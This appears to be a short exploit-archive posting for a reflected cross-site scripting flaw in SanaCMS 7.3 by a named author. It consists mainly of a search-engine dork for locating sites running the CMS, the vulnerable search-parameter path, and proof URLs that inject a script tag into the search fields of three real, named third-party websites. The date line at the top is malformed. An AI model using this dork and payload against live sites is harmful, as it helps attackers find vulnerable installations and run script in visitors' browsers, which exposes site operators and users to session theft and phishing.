SANADATA SanaCMS 7.3 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>SANADATA | SanaCMS 7.3 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================| |A Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting | |A Exploit Author: Hosein Askari | |A Vendor HomePage: https://www.sanadata.com/| | |A Version : 7.3 | |A Dork : intext:"SANADATA | SanaCMS 7.3" | |A Tested on:Parrot OS | |A Date: 3 /2 / 2017 | |Gategory: WebApplication *=============================================================| |Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search= *===========================| | Proof : | |http://www.corianco.com/fa/index.asp?p=search&search=<script>alert("xss")</script> |http://www.esmhome.com/en/index.asp?p=search&search=<script>alert("xss")</script> http://www.goldstarlogistics.org/fa/index.asp?p=search&search=<script>alert("xss")</script> *===========================| | Vulnerability description |This CMS has a Cross Site Scripting Vulnerability *=============================================================| | Discovered By : C0NSTANTINE *=============================================================|</BODY></HTML>